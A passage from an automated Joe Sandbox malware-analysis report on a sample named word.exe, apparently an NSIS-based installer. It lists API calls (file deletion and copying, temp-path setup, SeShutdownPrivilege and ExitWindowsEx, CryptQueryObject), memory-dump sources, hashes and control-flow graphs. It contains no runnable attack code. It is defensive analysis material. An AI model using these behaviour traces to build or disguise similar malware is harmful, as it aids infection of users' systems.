                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3355392842
                                                          • Opcode ID: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                                          • Instruction ID: 0fe4964e98027e88380181352afc78dea88c0f551701ba437740c6db36bc47f5
                                                          • Opcode Fuzzy Hash: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                                          • Instruction Fuzzy Hash: 0EE0EC7390512097C6215F96AD04B5ABB686B89B62F06842AED407B3A18B746C418BD9
                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\word.exe,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 004057CE
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\word.exe,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 004057DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-3370423016
                                                          • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                          • Instruction ID: f40007591d3941cd74726badf399ab62381001b9e0dca56ace991d14a2ccaf85
                                                          • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                          • Instruction Fuzzy Hash: 4BD0A7B280CD705FF30352109C04B8F6A48CF16310F094063E040A71D0C2781C414BFD
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_word.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                          • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                          • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                          • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
                                                          • lstrcmpiA.KERNEL32(00405B16,00000000), ref: 0040590F
                                                          • CharNextA.USER32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405920
                                                          • lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                          • Instruction ID: 42f6177a7bbf9ad164fe3de6883cfd7493767cce72774148ee1a9d65a6b1b045
                                                          • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                          • Instruction Fuzzy Hash: 87F06236604558FFC7129FA5DD4099EBBA8EF16360B2540A9E800F7260D674EE01ABA9

                                                          Execution Graph

                                                          Execution Coverage:11%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:100%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 10301 151b78 10302 151bd0 CryptQueryObject 10301->10302 10303 151c88 10302->10303

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1165 151b77-151bc8 1167 151bd0-151c86 CryptQueryObject 1165->1167 1168 151c8f-151ce5 1167->1168 1169 151c88-151c8e 1167->1169 1169->1168
                                                          APIs
                                                          • CryptQueryObject.CRYPT32(?,?,?,?,?,?,?,?,?,?,?), ref: 00151C76
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_150000_word.jbxd
                                                          Similarity
                                                          • API ID: CryptObjectQuery
                                                          • String ID:
                                                          • API String ID: 1409351862-0
                                                          • Opcode ID: 18ab6fac01e55d3aa2e6f0df04e4f90d22596fdcaa829ff7aedf585494e1e694
                                                          • Instruction ID: 1c7fca796ac300a65624fea55532a5bb01ac037f2ee04ee8f9994f900423978d
                                                          • Opcode Fuzzy Hash: 18ab6fac01e55d3aa2e6f0df04e4f90d22596fdcaa829ff7aedf585494e1e694
                                                          • Instruction Fuzzy Hash: 74517AB9D042589FDF11CFA9D984AEEFBB1AB19310F24A02AE814B7210D335A955CF58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1173 151b78-151c86 CryptQueryObject 1175 151c8f-151ce5 1173->1175 1176 151c88-151c8e 1173->1176 1176->1175
                                                          APIs
                                                          • CryptQueryObject.CRYPT32(?,?,?,?,?,?,?,?,?,?,?), ref: 00151C76
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_150000_word.jbxd
                                                          Similarity
                                                          • API ID: CryptObjectQuery
                                                          • String ID:
                                                          • API String ID: 1409351862-0
                                                          • Opcode ID: d255db5817b911659d8f4c1a5c41dc295bc77b0616c36ecca86cf94c609620cd
                                                          • Instruction ID: 1d60c960c04d8936f191def421776130bc991f9678377dc2afc5be85a45c4824
                                                          • Opcode Fuzzy Hash: d255db5817b911659d8f4c1a5c41dc295bc77b0616c36ecca86cf94c609620cd
                                                          • Instruction Fuzzy Hash: 16517AB9D042589FDF11CFA9D984ADEFBB1AB19310F24A02AE814B7210D335A955CF58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1414 15b43c-15c1d0 1417 15c1d7-15c260 1414->1417 1418 15c1d2 1414->1418 1419 15c262-15c263 1417->1419 1420 15c268-15c2b4 call 154c44 1417->1420 1418->1417 1421 15ccaa-15ccb1 1419->1421 1425 15c2b6-15c2e7 1420->1425 1426 15c2e8-15c2f2 1420->1426 1425->1426 1427 15c2f4-15c30e 1426->1427 1428 15c310-15c312 1426->1428 1430 15c315-15c320 1427->1430 1428->1430 1431 15c336-15c340 1430->1431 1432 15c322-15c335 1430->1432 1434 15c364-15c366 1431->1434 1435 15c342-15c362 1431->1435 1432->1431 1436 15c369-15c374 1434->1436 1435->1436 1439 15c431-15c449 1436->1439 1440 15c37a-15c3e3 call 15c040 call 154d94 * 3 1436->1440 1441 15c4a5-15c556 1439->1441 1442 15c44b-15c4a0 1439->1442 1462 15c3e5-15c420 1440->1462 1463 15c421-15c424 call 15c040 1440->1463 1456 15c557-15c80f call 15c050 call 15c060 1441->1456 1442->1456 1575 15c811-15c856 call 154d94 * 3 1456->1575 1576 15c858-15c892 call 154d94 * 3 1456->1576 1462->1463 1467 15c429-15c42c 1463->1467 1469 15c894-15c8ff call 154ce4 call 15bff0 call 154c44 1467->1469 1484 15c905-15c917 1469->1484 1485 15cb09-15cb1b 1469->1485 1486 15c91d-15c93b 1484->1486 1487 15ca29-15ca47 1484->1487 1489 15cb21-15cb2c 1485->1489 1490 15cc2d-15cc45 1485->1490 1491 15c943-15c954 1486->1491 1492 15c93d-15c93e 1486->1492 1495 15caed-15cb04 1487->1495 1496 15ca4d-15ca65 1487->1496 1497 15cb2e-15cb49 1489->1497 1498 15cb4b 1489->1498 1493 15cc47-15cc5e call 15c070 1490->1493 1494 15cc60-15ccb1 call 15c080 call 15c090 1490->1494 1500 15c985-15c99d 1491->1500 1501 15c956-15c980 call 15c040 1491->1501 1492->1421 1495->1421 1503 15ca67-15ca7e call 15c070 1496->1503 1504 15ca80-15cae2 call 15c080 call 15c090 1496->1504 1499 15cb52-15cb5d 1497->1499 1498->1499 1507 15cc26-15cc28 1499->1507 1508 15cb63-15cc25 call 154d94 * 2 call 15c060 1499->1508 1509 15c99f-15c9b6 call 15c070 1500->1509 1510 15c9b8-15ca24 call 15c080 call 15c090 1500->1510 1527 15cae9-15caeb 1503->1527 1547 15cae7-15cae8 1504->1547 1508->1507 1547->1527 1589 15c893 1575->1589 1576->1589 1589->1469
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_150000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 10b4d9a9f88d5075a20ce2a2c5b7e3c71bb8a0df8cd234eaba52250b2afc8449
                                                          • Instruction ID: dd33f4bdd56e298adb6a04abed14a656bbd0e6edb1655336f91188b2715f5373
                                                          • Opcode Fuzzy Hash: 10b4d9a9f88d5075a20ce2a2c5b7e3c71bb8a0df8cd234eaba52250b2afc8449
                                                          • Instruction Fuzzy Hash: 4872D834A01228CFDB14DFA8C894BEDBBB2BF49309F1454A9E819AB351DB359D85CF44
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5951891471.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_ad000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12e8fb07a9a3bf916523515fcaad3428a5795669aa3c2fec99cc6325001d9fc5
                                                          • Instruction ID: 8a6fe4552c806ff87b1f0100f471130af843efca86f8a8b735de7c9f4d55f182
                                                          • Opcode Fuzzy Hash: 12e8fb07a9a3bf916523515fcaad3428a5795669aa3c2fec99cc6325001d9fc5
                                                          • Instruction Fuzzy Hash: 3221F271604340EFDB24DF64D9C0F16BBA1EB89314F34C96AD84A4FA46C73AD847CA62
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5951891471.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_ad000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63d6e41dc7c18da6184b83d27161a14c57735bd0c63291f7f16d6b660c39bf07
                                                          • Instruction ID: 96cf120caf3cf182070f67fa558fa2ac77250b08fdaf796a37ad93a656690996
                                                          • Opcode Fuzzy Hash: 63d6e41dc7c18da6184b83d27161a14c57735bd0c63291f7f16d6b660c39bf07
                                                          • Instruction Fuzzy Hash: 44210471604300EFEB55DF94D9C0B2ABBA1FB95314F34C56ED84A4BA42C73AD846CB62
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403238
                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403243
                                                          • OleInitialize.OLE32(00000000), ref: 0040324A
                                                            • Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
                                                            • Part of subcall function 0040601C: LoadLibraryA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406039
                                                            • Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A
                                                          • SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,?,00000000,00000009), ref: 00403272
                                                            • Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE
                                                          • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
                                                          • GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 0040329A
                                                          • CharNextA.USER32(00000000,00429000,00000020), ref: 004032C5
                                                          • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 004033C2
                                                          • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 004033D3
                                                          • lstrcatA.KERNEL32(0042A400,\Temp), ref: 004033DF
                                                          • GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 004033F3
                                                          • lstrcatA.KERNEL32(0042A400,Low), ref: 004033FB
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 0040340C
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 00403414
                                                          • DeleteFileA.KERNEL32(0042A000), ref: 00403428
                                                          • OleUninitialize.OLE32(?), ref: 004034D6
                                                          • ExitProcess.KERNEL32 ref: 004034F6
                                                          • lstrcatA.KERNEL32(0042A400,~nsu.tmp,00429000,00000000,?), ref: 00403502
                                                          • lstrcmpiA.KERNEL32(0042A400,00429C00), ref: 0040350E
                                                          • CreateDirectoryA.KERNEL32(0042A400,00000000), ref: 0040351A
                                                          • SetCurrentDirectoryA.KERNEL32(0042A400), ref: 00403521
                                                          • DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,00424000,?), ref: 0040357A
                                                          • CopyFileA.KERNEL32(0042AC00,0041E8B8,00000001), ref: 0040358E
                                                          • CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
                                                          • GetCurrentProcess.KERNEL32(?,?,00000006,00000005,?), ref: 00403614
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: "$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$`KYw$~nsu.tmp
                                                          • API String ID: 4107622049-1333629530
                                                          • Opcode ID: de19fc6eb43a7d3fd348213b3199de702639297796c08e6194a8a61e32d4d2c8
                                                          • Instruction ID: a1c447b546bb562fff2a187ff51308e62fc677b1bbcaaf8e03341a31a96d3340
                                                          • Opcode Fuzzy Hash: de19fc6eb43a7d3fd348213b3199de702639297796c08e6194a8a61e32d4d2c8
                                                          • Instruction Fuzzy Hash: DFB1F570608351BAE7216F619C8DA2B3EA89B45706F04443FF541BA2D2C77C9E01CB6E
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404971
                                                          • GetDlgItem.USER32(?,00000408), ref: 0040497C
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 004049C6
                                                          • LoadBitmapA.USER32(0000006E), ref: 004049D9
                                                          • SetWindowLongA.USER32(?,?,00404F50), ref: 004049F2
                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404A06
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
                                                          • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404A4C
                                                          • DeleteObject.GDI32(00000000), ref: 00404A4F
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
                                                          • GetWindowLongA.USER32(?,?), ref: 00404B89
                                                          • SetWindowLongA.USER32(?,?,00000000), ref: 00404B97
                                                          • ShowWindow.USER32(?,00000005), ref: 00404BA8
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
                                                          • SendMessageA.USER32(?,?,00000000,00000000), ref: 00404D1F
                                                          • SendMessageA.USER32(?,00000420,00000000,?), ref: 00404D43
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D78
                                                          • GlobalFree.KERNEL32(?), ref: 00404D88
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
                                                          • ShowWindow.USER32(?,00000000), ref: 00404F27
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F32
                                                          • ShowWindow.USER32(00000000), ref: 00404F39
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: cd2996e30e9c20533b75e243f2167e3a83656f86b4c2f654de93cabef9ea3e18
                                                          • Instruction ID: 292d5c244ab645820c7f02bed8ff3f2a610eed88cba0887a0da166436049191d
                                                          • Opcode Fuzzy Hash: cd2996e30e9c20533b75e243f2167e3a83656f86b4c2f654de93cabef9ea3e18
                                                          • Instruction Fuzzy Hash: A10250B0900209AFEF109F54DC85AAE7BB5FB84315F10817AFA11B62E1D7789E42DF58
                                                          APIs
                                                          • DeleteFileA.KERNEL32(?,?,0042A400,77582EE0,00000000), ref: 004055DA
                                                          • lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,0042A400,77582EE0,00000000), ref: 00405622
                                                          • lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,0042A400,77582EE0,00000000), ref: 00405643
                                                          • lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,0042A400,77582EE0,00000000), ref: 00405649
                                                          • FindFirstFileA.KERNEL32(00420D00,?,?,?,00409014,?,00420D00,?,?,0042A400,77582EE0,00000000), ref: 0040565A
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405707
                                                          • FindClose.KERNEL32(00000000), ref: 00405718
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*
                                                          • API String ID: 2035342205-1173974218
                                                          • Opcode ID: e22ae86df826857fbde9b8311652889abe6f1c16a65206db964d77a6b66f7b7e
                                                          • Instruction ID: 987af563c2c121d98d0664262626d3ce0c78e9a6bdf03ff904ac809f9c790c88
                                                          • Opcode Fuzzy Hash: e22ae86df826857fbde9b8311652889abe6f1c16a65206db964d77a6b66f7b7e
                                                          • Instruction Fuzzy Hash: 0F51CF70800A44BADF216A629C45BBF7AB8DF42754F54803BF445B21D2D73C9942EF6E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
                                                          • Instruction ID: b03426f2c8dea12abf8fb2d8b94ab036f7606c67c5ec72f888080e52c6ca951d
                                                          • Opcode Fuzzy Hash: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
                                                          • Instruction Fuzzy Hash: 3FF15470D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF45
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_150000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 68fed19f2e2018fd1f55632966c9ba1bd036e2338c28c715791c20738bdb3892
                                                          • Instruction ID: 077b52a434e7977b05678916e600eceff7d5c0c0078fa7b30fefe3fe5bc4d52b
                                                          • Opcode Fuzzy Hash: 68fed19f2e2018fd1f55632966c9ba1bd036e2338c28c715791c20738bdb3892
                                                          • Instruction Fuzzy Hash: 46916A74E01208CFCB04DFA8C488AEDBBF1BB4A315F1591A9E819BB365D734A985CF54
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_150000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cc87560c9fdbc07ff8d6977ea38dece8ffeef301f1d4c899e7bf2837ddab66e7
                                                          • Instruction ID: 2a9fcaa37a0bc76c9f35e32fb9089e66785859dd4a2959f256cd5cc43f7ca8ad
                                                          • Opcode Fuzzy Hash: cc87560c9fdbc07ff8d6977ea38dece8ffeef301f1d4c899e7bf2837ddab66e7
                                                          • Instruction Fuzzy Hash: C4419BB8D05248EFCB14CFA9D584A9EFBF0BB49310F64842AE819B7310D734A945CF54
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_150000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7d93e1c4c2864671f96cece02754c96b99178dbc8bdc66a14d04cd689867943
                                                          • Instruction ID: 4309248dcb801a9ff5d94d8d64688859e971ef99a93147757494e9dcbcbfb6a5
                                                          • Opcode Fuzzy Hash: a7d93e1c4c2864671f96cece02754c96b99178dbc8bdc66a14d04cd689867943
                                                          • Instruction Fuzzy Hash: C93189B8D01258EFCB14CFA9E584A9EFBF5BB49310F24942AE819BB310D734A945CF54
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 0040517A
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405189
                                                          • GetClientRect.USER32(?,?), ref: 004051C6
                                                          • GetSystemMetrics.USER32(00000015), ref: 004051CE
                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051EF
